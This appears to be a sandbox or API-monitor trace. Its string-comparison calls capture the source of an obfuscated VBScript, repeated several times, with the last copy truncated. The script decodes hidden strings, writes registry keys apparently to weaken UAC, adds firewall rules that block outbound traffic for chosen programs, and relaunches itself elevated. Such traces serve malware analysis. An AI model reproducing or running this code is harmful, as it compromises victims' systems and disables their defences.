bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0226.278] wcsncmp (_String1="e Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.278] wcsncmp (_String1=" Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.278] wcsncmp (_String1="Next\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 65 [0226.279] wcsncmp (_String1="ext\r\n\r\nDim key\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite 